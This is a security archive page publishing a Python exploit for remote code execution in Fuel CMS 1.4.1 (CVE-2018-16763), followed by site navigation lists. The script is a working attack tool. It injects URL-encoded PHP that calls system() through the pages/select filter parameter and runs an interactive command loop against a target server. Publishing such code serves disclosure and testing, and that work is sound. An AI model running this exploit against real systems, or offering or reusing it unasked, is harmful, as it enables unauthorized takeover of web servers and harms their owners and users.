Fuel CMS 1.4.1 Remote Code Execution

Fuel CMS 1.4.1 Remote Code Execution: Posted Nov 3, 2021; Authored by Padsala Trushal; Fuel CMS version 1.4.1 remote code execution exploit. Original discovery of remote code execution in this version is attributed to 0xd0ff9 in July of 2019.; tags | exploit, remote, code execution; advisories | CVE-2018-16763; SHA-256 | 680df0adc4795784952b3da1b95668a5218f4d735514ee157a61844ce3a17406; Download | Favorite | View

Fuel CMS 1.4.1 Remote Code Execution

# Exploit Title: Fuel CMS 1.4.1 - Remote Code Execution (3)
# Exploit Author: Padsala Trushal
# Date: 2021-11-03
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763

#!/usr/bin/python3

import requests
from urllib.parse import quote
import argparse
import sys
from colorama import Fore, Style

def get_arguments():
  parser = argparse.ArgumentParser(description='fuel cms fuel CMS 1.4.1 - Remote Code Execution Exploit',usage=f'python3 {sys.argv[0]} -u <url>',epilog=f'EXAMPLE - python3 {sys.argv[0]} -u http://10.10.21.74')

  parser.add_argument('-v','--version',action='version',version='1.2',help='show the version of exploit')

  parser.add_argument('-u','--url',metavar='url',dest='url',help='Enter the url')

  args = parser.parse_args()

  if len(sys.argv) <=2:
    parser.print_usage()
    sys.exit()
  
  return args


args = get_arguments()
url = args.url 

if "http" not in url:
  sys.stderr.write("Enter vaild url")
  sys.exit()

try:
   r = requests.get(url)
   if r.status_code == 200:
       print(Style.BRIGHT+Fore.GREEN+"[+]Connecting..."+Style.RESET_ALL)


except requests.ConnectionError:
    print(Style.BRIGHT+Fore.RED+"Can't connect to url"+Style.RESET_ALL)
    sys.exit()

while True:
  cmd = input(Style.BRIGHT+Fore.YELLOW+"Enter Command $"+Style.RESET_ALL)
    
  main_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+quote(cmd)+"%27%29%2b%27"

  r = requests.get(main_url)

  #<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">

  output = r.text.split('<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">')
  print(output[0])
  if cmd == "exit":
    break

Top Authors In Last 30 Days

Red Hat 255 files
indoushka 93 files
Ubuntu 89 files
Gentoo 36 files
Jasper Nota 25 files
Debian 21 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,099)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,756)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,521)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,747)
UNIX (9,436)
UnixWare (187)
Windows (6,674)
Other

Fuel CMS 1.4.1 Remote Code Execution

Fuel CMS 1.4.1 Remote Code Execution

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Fuel CMS 1.4.1 Remote Code Execution

Share This

Fuel CMS 1.4.1 Remote Code Execution

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems